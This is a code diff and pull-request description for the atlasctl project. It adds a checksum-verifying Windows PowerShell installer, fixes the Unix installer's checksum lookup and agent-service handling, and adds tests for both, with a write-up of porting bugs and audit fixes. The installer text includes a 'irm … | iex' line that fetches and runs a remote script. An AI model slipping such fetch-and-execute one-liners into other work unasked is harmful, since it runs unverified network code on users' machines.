+            Die ("Windows on ARM is not supported yet: no atlasctl binary is " +
+                 "built for it. x86_64 emulation would run, but Docker Desktop " +
+                 "is what atlasctl drives and that combination is untested, so " +
+                 "shipping it would be shipping a promise.")
+        }
+        default { Die "unsupported processor architecture: $arch" }
+    }
+}
+
+function Get-Sha256 { param($Path) (Get-FileHash -Algorithm SHA256 -Path $Path).Hash.ToLower() }
+
+# The one check that has to hold before anything is executed: the bytes match
+# what the release says they are.
+function Assert-Checksum {
+    param($Archive, $SumsFile)
+    $name = Split-Path -Leaf $Archive
+    $want = $null
+    foreach ($line in Get-Content $SumsFile) {
+        $parts = $line -split '\s+', 2
+        if ($parts.Count -eq 2 -and $parts[1].Trim() -eq $name) { $want = $parts[0].Trim().ToLower() }
+    }
+    if (-not $want) { Die "SHA256SUMS has no entry for $name; refusing to install unverified binaries." }
+    $have = Get-Sha256 $Archive
+    if ($have -ne $want) {
+        Die "checksum mismatch for ${name}: expected $want, got $have. Refusing to install."
+    }
+    Write-Info "checksum verified"
+}
+
+function Get-Version {
+    param($Exe)
+    if (-not (Test-Path $Exe)) { return '' }
+    # A binary that cannot be run compares unequal, which lands on the upgrade
+    # path -- the safe direction.
+    try { return (& $Exe --version 2>$null | Select-Object -First 1) } catch { return '' }
+}
+
+function Install-Agent {
+    param($Exe, $SameVersion)
+
+    if ($env:ATLASCTL_NO_AGENT) {
+        Write-Info "skipping the background agent (ATLASCTL_NO_AGENT is set)."
+        Write-Info "start it yourself later with: $BinName agent install"
+        return
+    }
+
+    # Re-running the installer on a machine that already has this exact version
+    # is the commonest reason to run it at all: the binary is there, the task is
+    # not running, and the website says "no agent". Nothing needs installing --
+    # the machine needs starting.
+    if ($SameVersion) {
+        & $Exe agent status *> $null
+        if ($LASTEXITCODE -eq 0) {
+            Write-Info "the agent is already running - this machine is ready."
+            Write-Info "if a browser does not see it, pair it: $BinName agent token"
+            return
+        }
+        Write-Info "starting the agent that is already installed here"
+    } else {
+        Write-Info "installing the background agent"
+    }
+
+    & $Exe agent install
+    if ($LASTEXITCODE -eq 0) {
+        Write-Info "pair your browser with: $BinName agent token"
+        return
+    }
+
+    Write-Warn "could not install the agent as a scheduled task on this machine."
+    Write-Warn "atlasctl itself is installed and works."
+    # Naming the likeliest cause rather than telling the operator to re-run the
+    # command that just failed: an agent already holding the port is what makes
+    # a re-install look like a broken install.
+    $held = Get-NetTCPConnection -LocalPort $Port -State Listen -ErrorAction SilentlyContinue
+    if ($held) {
+        Write-Warn "an agent is ALREADY listening on 127.0.0.1:$Port, so this machine"
+        Write-Warn "is usable right now - the website will find it. Nothing else to do."
+        return
+    }
+    Write-Warn "To run the agent by hand:"
+    Write-Warn "    $BinName agent run"
+    Write-Warn "Its startup log, if the task did start and then exit:"
+    Write-Warn "    Get-Content -Tail 50 $env:LOCALAPPDATA\atlasctl\atlasctl-agent.log"
+}
+
+function Test-Docker {
+    if (-not (Get-Command docker -ErrorAction SilentlyContinue)) {
+        Write-Warn "docker was not found. ``atlasctl run`` needs it; ``atlasctl list`` and"
+        Write-Warn "the control page work without it. Install Docker Desktop from"
+        Write-Warn "https://docs.docker.com/desktop/install/windows-install/"
+        return
+    }
+    docker info *> $null
+    if ($LASTEXITCODE -ne 0) {
+        # Installed but not running is its own state, and its own fix. Telling
+        # someone to install what they already have is how a working machine
+        # gets called broken.
+        Write-Warn "docker is installed but not responding. Start Docker Desktop and"
+        Write-Warn "wait for it to say 'Engine running', then try ``atlasctl run`` again."
+    }
+}
+
+# --- main ---------------------------------------------------------------------
+
+$target = Get-Target
+
+$version = if ($env:ATLASCTL_VERSION) { $env:ATLASCTL_VERSION } else { 'latest' }
+$base = if ($version -eq 'latest') {
+    "https://github.com/$Repo/releases/latest/download"
+} else {
+    "https://github.com/$Repo/releases/download/$version"
+}
+
+$tmp = Join-Path ([System.IO.Path]::GetTempPath()) ("atlasctl-" + [System.Guid]::NewGuid().ToString('N'))
+New-Item -ItemType Directory -Force -Path $tmp | Out-Null
+try {
+    $archiveName = "$BinName-$target.zip"
+    Write-Info "downloading $archiveName"
+    $archive = Join-Path $tmp $archiveName
+    try {
+        Invoke-WebRequest -UseBasicParsing -Uri "$base/$archiveName" -OutFile $archive
+    } catch {
+        Die "could not download $base/$archiveName - is there a release for $target yet?"
+    }
+    $sums = Join-Path $tmp 'SHA256SUMS'
+    try {
+        Invoke-WebRequest -UseBasicParsing -Uri "$base/SHA256SUMS" -OutFile $sums
+    } catch {
+        Die "could not download SHA256SUMS; refusing to install unverified binaries."
+    }
+    Assert-Checksum -Archive $archive -SumsFile $sums
+
+    Expand-Archive -Path $archive -DestinationPath $tmp -Force
+    $staged = Join-Path $tmp "$BinName.exe"
+    if (-not (Test-Path $staged)) { Die "the archive did not contain $BinName.exe" }
+
+    $dir = if ($env:ATLASCTL_INSTALL_DIR) {
+        $env:ATLASCTL_INSTALL_DIR
+    } else {
+        Join-Path $env:LOCALAPPDATA 'Programs\atlasctl'
+    }
+    New-Item -ItemType Directory -Force -Path $dir | Out-Null
+    $exe = Join-Path $dir "$BinName.exe"
+
+    # Ask the two binaries their versions rather than parsing a release tag: the
+    # downloaded one is already here and already checksum-verified, so this
+    # needs no second endpoint and cannot be fooled by a tag naming scheme that
+    # changes.
+    $newVersion = Get-Version $staged
+    $oldVersion = Get-Version $exe
+    $sameVersion = $newVersion -and ($oldVersion -eq $newVersion)
+
+    if ($sameVersion) {
+        Write-Info "$newVersion is already installed here - keeping it."
+    } else {
+        if ($oldVersion) { Write-Info "upgrading $oldVersion -> $newVersion" }
+        # Replacing a RUNNING exe fails with "file in use", and the agent this
+        # installer is upgrading is exactly such a process. Move it aside first:
+        # Windows permits renaming a running image, and the stale copy is
+        # cleaned up on the next install.
+        if (Test-Path $exe) {
+            $old = "$exe.old"
+            Remove-Item -Force $old -ErrorAction SilentlyContinue
+            try { Move-Item -Force $exe $old } catch { }
+        }
+        Copy-Item -Force $staged $exe
+        Write-Info "installed $exe"
+    }
+
+    # User PATH, not machine PATH: this install needs no administrator, and
+    # writing the machine PATH from a non-elevated shell fails anyway.
+    $userPath = [Environment]::GetEnvironmentVariable('Path', 'User')
+    if (-not $userPath) { $userPath = '' }
+    if (($userPath -split ';') -notcontains $dir) {
+        [Environment]::SetEnvironmentVariable('Path', "$userPath;$dir".Trim(';'), 'User')
+        # The variable above only reaches NEW processes, so say so rather than
+        # letting the next command in this very window fail as "not recognized".
+        Write-Info "added $dir to your PATH - open a new terminal for it to take effect."
+        $env:Path = "$env:Path;$dir"
+    }
+
+    Test-Docker
+    Install-Agent -Exe $exe -SameVersion $sameVersion
+
+    Write-Info "done. Try:"
+    Write-Info "    $BinName list"
+    Write-Info "    $BinName run qwen3.6-35b-a3b-fp8-mtp"
+} finally {
+    Remove-Item -Recurse -Force $tmp -ErrorAction SilentlyContinue
+}

--- a/scripts/install.ps1
+++ b/scripts/install.ps1
@@ -50,7 +50,10 @@ function Assert-Checksum {
     param($Archive, $SumsFile)
     $name = Split-Path -Leaf $Archive
     $want = $null
-    foreach ($line in Get-Content $SumsFile) {
+    # -LiteralPath, like every other path this script touches: `Get-Content`
+    # globs, and a directory named `[build]` is legal and would fail the
+    # checksum lookup with "cannot find path" rather than a verdict.
+    foreach ($line in Get-Content -LiteralPath $SumsFile) {
         $parts = $line -split '\s+', 2
         if ($parts.Count -eq 2 -and $parts[1].Trim() -eq $name) { $want = $parts[0].Trim().ToLower() }
     }
@@ -64,7 +67,7 @@ function Assert-Checksum {
 
 function Get-Version {
     param($Exe)
-    if (-not (Test-Path $Exe)) { return '' }
+    if (-not (Test-Path -LiteralPath $Exe)) { return '' }
     # A binary that cannot be run compares unequal, which lands on the upgrade
     # path -- the safe direction.
     try { return (& $Exe --version 2>$null | Select-Object -First 1) } catch { return '' }
@@ -174,7 +177,7 @@ try {
 
     Expand-Archive -Path $archive -DestinationPath $tmp -Force
     $staged = Join-Path $tmp "$BinName.exe"
-    if (-not (Test-Path $staged)) { Die "the archive did not contain $BinName.exe" }
+    if (-not (Test-Path -LiteralPath $staged)) { Die "the archive did not contain $BinName.exe" }
 
     $dir = if ($env:ATLASCTL_INSTALL_DIR) {
         $env:ATLASCTL_INSTALL_DIR
@@ -200,7 +203,7 @@ try {
         # installer is upgrading is exactly such a process. Move it aside first:
         # Windows permits renaming a running image, and the stale copy is
         # cleaned up on the next install.
-        if (Test-Path $exe) {
+        if (Test-Path -LiteralPath $exe) {
             $old = "$exe.old"
             Remove-Item -Force $old -ErrorAction SilentlyContinue
             try { Move-Item -Force $exe $old } catch { }

--- a/scripts/install.sh
+++ b/scripts/install.sh
@@ -62,7 +62,16 @@ verify_checksum() {
     sums="$2"
     name=$(basename "$archive")
 
-    expected=$(grep "  $name\$" "$sums" | awk '{print $1}' || true)
+    # An exact field comparison, not a regex match. `grep "  $name\$"` put the
+    # filename into a pattern, where `.` matches any character — so
+    # `atlasctl-x86_64-unknown-linux-musl.tar.xz` also matched a line naming
+    # `...-muslXtarXxz`. Nothing generates such a name today, which is the whole
+    # problem with leaving it: the check that decides whether to execute a
+    # downloaded binary should not depend on that staying true.
+    #
+    # The `*` form is accepted because `sha256sum -b` writes it, and a SHA256SUMS
+    # produced that way is not malformed.
+    expected=$(awk -v n="$name" '$2 == n || $2 == "*" n { print $1 }' "$sums")
     [ -n "$expected" ] || die "no checksum for $name in SHA256SUMS; refusing to install."
 
     if command -v sha256sum >/dev/null 2>&1; then

--- a/scripts/install.sh
+++ b/scripts/install.sh
@@ -34,8 +34,16 @@ detect_target() {
     case "$os" in
         Linux)  os_part="unknown-linux-musl" ;;
         Darwin) os_part="apple-darwin" ;;
+        # Git Bash and MSYS reach here on Windows. They are not the way in:
+        # the Windows build is native, and the installer for it is a different
+        # script. Naming that beats "not supported", which was true when it was
+        # written and would now send someone away from a working install.
+        MINGW*|MSYS*|CYGWIN*|Windows_NT)
+            die "this is the unix installer. On Windows, run in PowerShell:
+    irm https://atlasinference.io/install.ps1 | iex"
+            ;;
         *)
-            die "unsupported operating system: $os. atlasctl supports Linux and macOS; Windows is not supported."
+            die "unsupported operating system: $os. atlasctl supports Linux, macOS and Windows."
             ;;
     esac
     case "$arch" in

--- a/scripts/install.sh
+++ b/scripts/install.sh
@@ -100,6 +100,16 @@ verify_attestation() {
 # atlasctl, and the CLI works fully without an agent — so a failure here is a
 # note, not an error. ATLASCTL_NO_AGENT=1 skips it for anyone who would rather
 # decide when a background process with docker access starts running.
+# Whether a SUPERVISOR knows about the agent, as opposed to a process happening
+# to hold the port. The two are different machines to come back to tomorrow.
+service_installed() {
+    case "$(uname -s)" in
+        Darwin) launchctl print "gui/$(id -u)/io.atlasinference.atlasctl-agent" >/dev/null 2>&1 ;;
+        Linux)  systemctl --user is-enabled atlasctl-agent.service >/dev/null 2>&1 ;;
+        *)      return 1 ;;
+    esac
+}
+
 install_agent() {
     # The binary's path is passed rather than read from a variable another
     # function happened to set: install.sh runs under `set -eu` piped from the
@@ -116,8 +126,13 @@ install_agent() {
     # the machine needs STARTING. A join is the exception: it is the step the
     # operator came for, so it runs regardless.
     if [ -n "${4:-}" ] && [ -z "${2:-}" ]; then
-        if "$exe" agent status >/dev/null 2>&1; then
-            info "the agent is already running — this machine is ready."
+        # BOTH conditions, not just the port. An operator who ran `atlasctl
+        # agent run` by hand has an agent answering on 34333 and NO service, and
+        # skipping on the port alone left it that way: the terminal closes, the
+        # box reboots, and "the website says no agent" is back — the very
+        # symptom this script was changed to fix, reached through another door.
+        if "$exe" agent status >/dev/null 2>&1 && service_installed; then
+            info "the agent is already running as a service — this machine is ready."
             info "if a browser does not see it, pair it: $BIN_NAME agent token"
             return
         fi

--- a/scripts/tests/install-ps1.test.ps1
+++ b/scripts/tests/install-ps1.test.ps1
@@ -1,0 +1,94 @@
+# SPDX-License-Identifier: AGPL-3.0-only
+#
+# Tests for scripts/install.ps1 — the `irm … | iex` one-liner.
+#
+# The counterpart of install-sh.test.sh, over the same three decisions: which
+# target, whether a downloaded binary may be executed, and what to do about an
+# agent that may or may not already be there. Written without Pester so it runs
+# on a bare windows-latest with nothing installed.
+#
+# The script's functions are loaded by taking everything ABOVE its `# --- main`
+# marker and evaluating that, rather than by adding a "do not run when dot
+# sourced" guard to install.ps1. A hook that exists only for tests is
+# test-specific code in a production path; this file is where that cost belongs.
+
+$ErrorActionPreference = 'Stop'
+
+$root = Split-Path -Parent (Split-Path -Parent $PSScriptRoot)
+$src = Get-Content -Raw -Encoding UTF8 -LiteralPath (Join-Path $root 'scripts/install.ps1')
+$cut = $src.IndexOf('# --- main')
+if ($cut -lt 0) { throw 'install.ps1 no longer has its `# --- main` marker; this loader needs updating' }
+Invoke-Expression $src.Substring(0, $cut)
+
+# `Die` calls `exit`, which would end the test host rather than the case under
+# test. Redefined to throw so a refusal is observable instead of fatal.
+function Die { param($m) throw $m }
+
+$script:pass = 0
+$script:fail = 0
+function Ok   { param($n) $script:pass++; Write-Host "  ok   $n" }
+function Bad  { param($n, $d) $script:fail++; Write-Host "  FAIL $n`n     $d" }
+function Should-Contain { param($n, $hay, $needle)
+    if ("$hay" -like "*$needle*") { Ok $n } else { Bad $n "[$hay] does not contain [$needle]" }
+}
+function Should-Throw { param($n, $needle, [scriptblock]$body)
+    try { & $body; Bad $n "expected a refusal mentioning [$needle], got none" }
+    catch { Should-Contain $n $_.Exception.Message $needle }
+}
+
+# --- Assert-Checksum ----------------------------------------------------------
+# The decision that stands between `irm | iex` and executing arbitrary bytes.
+$work = Join-Path ([System.IO.Path]::GetTempPath()) ("atlasctl-ps1-test-" + [guid]::NewGuid().ToString('N'))
+New-Item -ItemType Directory -Force -Path $work | Out-Null
+try {
+    $archive = Join-Path $work 'atlasctl-x86_64-pc-windows-msvc.zip'
+    Set-Content -LiteralPath $archive -Value 'payload' -NoNewline
+    $good = (Get-FileHash -Algorithm SHA256 -LiteralPath $archive).Hash.ToLower()
+
+    $sums = Join-Path $work 'SHA256SUMS'
+    Set-Content -LiteralPath $sums -Value "$good  atlasctl-x86_64-pc-windows-msvc.zip"
+    try { Assert-Checksum -Archive $archive -SumsFile $sums; Ok 'a matching checksum is accepted' }
+    catch { Bad 'a matching checksum is accepted' $_.Exception.Message }
+
+    Set-Content -LiteralPath $sums -Value ("0" * 64 + "  atlasctl-x86_64-pc-windows-msvc.zip")
+    Should-Throw 'a mismatched checksum refuses to install' 'checksum mismatch' {
+        Assert-Checksum -Archive $archive -SumsFile $sums
+    }
+
+    Set-Content -LiteralPath $sums -Value "$good  some-other-file.zip"
+    Should-Throw 'an archive with no entry refuses to install' 'no entry' {
+        Assert-Checksum -Archive $archive -SumsFile $sums
+    }
+
+    # The shell script matched the filename as a regex, so a line naming a
+    # DIFFERENT file satisfied the lookup. This one splits on whitespace and
+    # compares exactly; the case is pinned here so the two stay agreed.
+    Set-Content -LiteralPath $sums -Value "$good  atlasctl-x86_64-pc-windows-msvcXzip"
+    Should-Throw 'a name that only matches loosely is not accepted' 'no entry' {
+        Assert-Checksum -Archive $archive -SumsFile $sums
+    }
+
+    # --- Get-Version ----------------------------------------------------------
+    # An unreadable or absent binary must compare UNEQUAL, which lands on the
+    # upgrade path — the safe direction. Reporting a version for a binary that
+    # cannot run would skip the install entirely.
+    if ((Get-Version (Join-Path $work 'does-not-exist.exe')) -eq '') {
+        Ok 'a missing binary reports no version'
+    } else {
+        Bad 'a missing binary reports no version' 'got something'
+    }
+} finally {
+    Remove-Item -Recurse -Force $work -ErrorAction SilentlyContinue
+}
+
+# --- Get-Target ---------------------------------------------------------------
+# Reads OSArchitecture, so it cannot be stubbed without rewriting the function.
+# What IS worth pinning is that this machine resolves to something buildable,
+# and that the ARM refusal names itself rather than falling through to an
+# x86_64 download that would run under emulation against an untested Docker.
+$t = Get-Target
+Should-Contain 'this runner resolves to a real target' $t 'pc-windows-msvc'
+
+Write-Host ""
+Write-Host "  $script:pass passed, $script:fail failed"
+if ($script:fail -gt 0) { exit 1 }

--- a/scripts/tests/install-sh.test.sh
+++ b/scripts/tests/install-sh.test.sh
@@ -36,6 +36,7 @@ contains() { # name haystack needle
 # --- detect_target ------------------------------------------------------------
 # Runs in a subshell per case so the stubbed `uname` cannot leak.
 target_for() { # os arch
+    # shellcheck source=/dev/null  # generated above, from install.sh
     ( . "$WORK/lib.sh"
       # shellcheck disable=SC2317  # called indirectly, by detect_target
       uname() { if [ "$1" = "-s" ]; then echo "$OS"; else echo "$ARCH"; fi; }
@@ -56,6 +57,7 @@ contains "an unknown arch is refused by name"      "$(target_for Linux mips64)" 
 printf 'payload\n' > "$WORK/atlasctl-x86_64-unknown-linux-musl.tar.xz"
 good=$(sha256sum "$WORK/atlasctl-x86_64-unknown-linux-musl.tar.xz" | awk '{print $1}')
 
+# shellcheck source=/dev/null  # generated above, from install.sh
 verify() { ( . "$WORK/lib.sh"; verify_checksum "$1" "$2" ) 2>&1; }
 
 printf '%s  atlasctl-x86_64-unknown-linux-musl.tar.xz\n' "$good" > "$WORK/SUMS.good"
@@ -91,7 +93,9 @@ EOF
 chmod +x "$WORK/fake-atlasctl"
 
 agent_run() { # same_version join running supervised
+    # shellcheck source=/dev/null  # generated above, from install.sh
     ( . "$WORK/lib.sh"
+      # shellcheck disable=SC2317  # both stubs are called by install_agent
       if [ "$4" = yes ]; then service_installed() { return 0; }; else service_installed() { return 1; }; fi
       RUNNING="$3" install_agent "$WORK/fake-atlasctl" "$2" "" "$1" ) 2>&1
 }

--- a/scripts/tests/install-sh.test.sh
+++ b/scripts/tests/install-sh.test.sh
@@ -1,0 +1,118 @@
+#!/usr/bin/env bash
+# SPDX-License-Identifier: AGPL-3.0-only
+#
+# Tests for scripts/install.sh — the `curl … | sh` one-liner.
+#
+# It is the most-executed artifact this project ships and the only one that
+# runs on a machine before any of our code is trusted, and it had no coverage
+# at all beyond shellcheck. The two things worth pinning are the decision to
+# EXECUTE a downloaded binary (verify_checksum) and the decisions an operator
+# actually hits (which target, and what `install_agent` does about an agent
+# that may or may not already be there).
+#
+# install.sh is loaded by stripping its final `main "$@"` rather than by adding
+# a "don't run when sourced" guard to it: a hook that exists only for tests is
+# test-specific code in a production path, and this file is the right place to
+# pay that cost instead.
+
+set -u
+
+ROOT=$(cd "$(dirname "$0")/../.." && pwd)
+WORK=$(mktemp -d)
+trap 'rm -rf "$WORK"' EXIT INT TERM
+
+sed 's/^main "\$@"$//' "$ROOT/scripts/install.sh" > "$WORK/lib.sh"
+
+pass=0; fail=0
+ok()   { pass=$((pass+1)); printf '  ok   %s\n' "$1"; }
+bad()  { fail=$((fail+1)); printf '  FAIL %s\n     %s\n' "$1" "$2"; }
+check() { # name expected actual
+    if [ "$2" = "$3" ]; then ok "$1"; else bad "$1" "expected [$2], got [$3]"; fi
+}
+contains() { # name haystack needle
+    case "$2" in *"$3"*) ok "$1" ;; *) bad "$1" "[$2] does not contain [$3]" ;; esac
+}
+
+# --- detect_target ------------------------------------------------------------
+# Runs in a subshell per case so the stubbed `uname` cannot leak.
+target_for() { # os arch
+    ( . "$WORK/lib.sh"
+      # shellcheck disable=SC2317  # called indirectly, by detect_target
+      uname() { if [ "$1" = "-s" ]; then echo "$OS"; else echo "$ARCH"; fi; }
+      OS="$1" ARCH="$2" detect_target ) 2>&1
+}
+
+check "linux x86_64"       "x86_64-unknown-linux-musl"  "$(OS=Linux ARCH=x86_64 target_for Linux x86_64)"
+check "macos arm"          "aarch64-apple-darwin"       "$(target_for Darwin arm64)"
+check "linux aarch64"      "aarch64-unknown-linux-musl" "$(target_for Linux aarch64)"
+check "linux amd64 alias"  "x86_64-unknown-linux-musl"  "$(target_for Linux amd64)"
+
+# Git Bash reports MINGW64_NT-…: the operator is on Windows and there IS an
+# installer for them, so pointing at it beats "not supported".
+contains "git bash names the powershell one-liner" "$(target_for MINGW64_NT-10.0-22631 x86_64)" "install.ps1"
+contains "an unknown arch is refused by name"      "$(target_for Linux mips64)"                 "mips64"
+
+# --- verify_checksum ----------------------------------------------------------
+printf 'payload\n' > "$WORK/atlasctl-x86_64-unknown-linux-musl.tar.xz"
+good=$(sha256sum "$WORK/atlasctl-x86_64-unknown-linux-musl.tar.xz" | awk '{print $1}')
+
+verify() { ( . "$WORK/lib.sh"; verify_checksum "$1" "$2" ) 2>&1; }
+
+printf '%s  atlasctl-x86_64-unknown-linux-musl.tar.xz\n' "$good" > "$WORK/SUMS.good"
+contains "a matching checksum is accepted" \
+    "$(verify "$WORK/atlasctl-x86_64-unknown-linux-musl.tar.xz" "$WORK/SUMS.good")" "checksum verified"
+
+printf '%s  atlasctl-x86_64-unknown-linux-musl.tar.xz\n' "${good%??}00" > "$WORK/SUMS.bad"
+contains "a mismatched checksum refuses to install" \
+    "$(verify "$WORK/atlasctl-x86_64-unknown-linux-musl.tar.xz" "$WORK/SUMS.bad")" "Refusing to install"
+
+printf '%s  some-other-file.tar.xz\n' "$good" > "$WORK/SUMS.absent"
+contains "an archive with no entry refuses to install" \
+    "$(verify "$WORK/atlasctl-x86_64-unknown-linux-musl.tar.xz" "$WORK/SUMS.absent")" "no checksum for"
+
+# The regression: the name was interpolated into a REGEX, so `.` matched any
+# character and a line naming a DIFFERENT file satisfied the lookup — handing
+# back a hash for bytes nobody checked.
+printf '%s  atlasctl-x86_64-unknown-linux-muslXtarXxz\n' "$good" > "$WORK/SUMS.regex"
+contains "a name that only matches as a regex is not accepted" \
+    "$(verify "$WORK/atlasctl-x86_64-unknown-linux-musl.tar.xz" "$WORK/SUMS.regex")" "no checksum for"
+
+# --- install_agent ------------------------------------------------------------
+cat > "$WORK/fake-atlasctl" <<'EOF'
+#!/bin/sh
+case "$1" in
+  --version) echo "atlasctl 9.9.9" ;;
+  agent) case "$2" in
+      status)  [ -n "${RUNNING:-}" ] && exit 0 || exit 1 ;;
+      install) echo "[fake] agent install ran" ;;
+    esac ;;
+esac
+EOF
+chmod +x "$WORK/fake-atlasctl"
+
+agent_run() { # same_version join running supervised
+    ( . "$WORK/lib.sh"
+      if [ "$4" = yes ]; then service_installed() { return 0; }; else service_installed() { return 1; }; fi
+      RUNNING="$3" install_agent "$WORK/fake-atlasctl" "$2" "" "$1" ) 2>&1
+}
+
+contains "a fresh install installs the service" \
+    "$(agent_run '' '' '' no)" "[fake] agent install ran"
+
+contains "same version, nothing running: it STARTS what is there" \
+    "$(agent_run yes '' '' yes)" "[fake] agent install ran"
+
+contains "same version, running AND supervised: nothing to do" \
+    "$(agent_run yes '' 1 yes)" "already running as a service"
+
+# The regression that reached the user's symptom by another door: an agent
+# started by hand answers the port with NO service behind it, and skipping on
+# the port alone left the machine with nothing that survives a logout.
+contains "answering the port without a service still installs one" \
+    "$(agent_run yes '' 1 no)" "[fake] agent install ran"
+
+contains "a join runs even when everything is already up" \
+    "$(agent_run yes '12345678@10.0.0.1' 1 yes)" "[fake] agent install ran"
+
+printf '\n  %d passed, %d failed\n' "$pass" "$fail"
+[ "$fail" -eq 0 ]


### PR DESCRIPTION
Supersedes #113, which GitHub closed irrecoverably when `--delete-branch` removed its base after #112 merged. Same branch, rebased onto main; #112's commit is dropped because its content is now on main.

The `windows` job on `windows-latest` is green end to end, including a **live install**: it registers the task, waits for port 34333 to actually open, re-installs to prove an upgrade happens in place, checks the log file is non-empty, and uninstalls.

```
agent installed and started
task state: Running
the agent is listening
agent installed and started          <- the RE-install; it used to say "NOT running"
the upgrade left a listening agent behind
--- agent log ---
node identity: f369-e0c8-99fc-9c0e
atlasctl agent listening on 127.0.0.1:34333
install / re-install / uninstall all clean
```

## The port

| | |
|---|---|
| `atlasctl_core::platform` | one place for home / config / cache / hostname / uid / free space / `which` / stdio redirect. State lives under `%LOCALAPPDATA%`, never `%APPDATA%` — that one roams, and `agent.key` is *this machine's* identity, so roaming it gives two machines one node identity |
| `HostSnapshot.posix_user: Option<PosixUser>` | `None` is an answer, not a gap: a Windows account has no uid, `--user 0:0` would run the container as root, and the `/etc/passwd` mounts that go with `--user` name host paths that do not exist |
| `atlasctl_core::secretfile` | replaced **two** `write_private` implementations, both of which had a `#[cfg(not(unix))]` arm that wrote the secret with no protection and verified nothing |
| `ServiceKind::ScheduledTask` | a logon task, not a service — session 0 cannot reach Docker Desktop's per-user named pipe. XML rather than `schtasks /SC ONLOGON` for one element: `ExecutionTimeLimit PT0S`. That route bakes in 72 hours, and a forever-process the scheduler kills every three days is a crash nobody can reproduce |
| `install.ps1`, zip artifact, `x86_64-pc-windows-msvc` | same shape as `install.sh`, including the upgrade/start semantics from #112 |

## What CI found that reading would not have

1. **No browser token could ever be minted.** `token::generate` opened `/dev/urandom` by hand — the odd one out, since the other three entropy draws (including the identity key seed) already used `getrandom`.
2. **`which` never matched anything.** `docker` is `docker.exe`; `doctor` would have called every tool absent.
3. **`check_disk` shelled out to `df -Pk`**, which does not exist there, while the fleet vitals asked the same question separately through `statvfs`. Both now call one `platform::free_bytes`.
4. **A refused connection is invisible.** Defender Firewall *drops* a SYN to a port with no listener rather than resetting it, so a closed port is **filtered**. Measured against a port reserved with a UDP socket — nothing has ever listened on it, so neither the filtered-low-port nor the TIME_WAIT explanation applies — and both `connect_timeout` and a blocking connect on its own thread saw silence. The threaded workaround I had written was removed rather than shipped.
5. **The upgrade told the operator their agent was down.** Task Scheduler's stop terminates *only* the process it started, so a `cmd.exe` wrapper that redirected output was killed and the agent it launched was orphaned, still holding the port. `agent run --log-file` moves the redirect inside the agent, removing the wrapper, the orphan, and a layer of quoting at once.
6. **Goldens failed with "rendering changed" when nothing had.** `expected 8255` is the committed 8023 bytes plus its 232 lines — CRLF on checkout, pinned by `.gitattributes`. The remaining 22 bytes were `$HOME` widening to `$env:USERPROFILE` because `display_portable` had started reading the platform; the placeholder is a parameter now, and the renderer is pure again.

## What an adversarial audit then found

Eleven more, including one that would have shipped broken:

- **`Get-Content -Raw` had no `-Encoding`.** `powershell` is always 5.1, which decodes a BOM-less file as the system ANSI codepage; the unit is UTF-8 without a BOM and always contains a multibyte character. On a profile path like `C:\Users\José` the registered `--log-file` and `--config-dir` arrive mojibake'd, and a corrupted `--config-dir` mints a fresh identity and rejoins the fleet as a stranger. Also `-LiteralPath`, because `-Path` globs and `C:\Users\[lab]` is a legal path.
- **The installer could leave a machine with no service at all** — the same-version skip asked only whether the port answered, and someone who ran `agent run` by hand has an agent answering and no service. Fixed on all three platforms.
- **Containment was anchored on `%USERPROFILE%` while secrets are written under `%LOCALAPPDATA%`** — a redirected LOCALAPPDATA made atlasctl refuse its own default directory, and a roaming profile on a UNC share would have passed. It also canonicalised the parent and never the final component, so `agent.key` could be a symlink out of the profile with `verify` passing forever.
- **`windows_quote` emitted 3n+1 backslashes before an embedded quote instead of 2n+1** — `a\"b` parsed back as `a\\b`. The new test re-parses the output as `CommandLineToArgvW` would; verified it fails on the old arithmetic.
- Three tests that could not fail were given real oracles.

## Two more, found by sweeping for the same bug classes elsewhere

- **`guard_cache_path` could be climbed out of.** It confines `git reset --hard` to the registry cache with `starts_with`, which compares *components* — so `<cache>/../../../my-project` begins with `<cache>` by that measure, the guard returned ok, and the hard reset ran in the user's own work. `RemoteRegistry.path` is deserialised straight out of `registries.yaml`, so nothing upstream rejected the `..`. Both new tests verified to fail against the old guard.
- **Every Mac advertised itself by the fallback string.** `hostname()` read `/proc/sys/kernel/hostname` under `#[cfg(unix)]`, and macOS is unix without `/proc`; `$HOSTNAME` is unset under launchd, so nodes appeared as `atlas-node`. Now `gethostname`.

## Deliberately not here

- **Windows on ARM.** No binary is built and `install.ps1` refuses it by name — x86_64 emulation would run, but Docker Desktop is what atlasctl drives and that combination is untested.
- **A DACL check on secrets.** `SECURITY.md` states the Windows guarantee plainly and as *weaker*: no mode bit, so what is verified is containment, not that a token has not been widened.
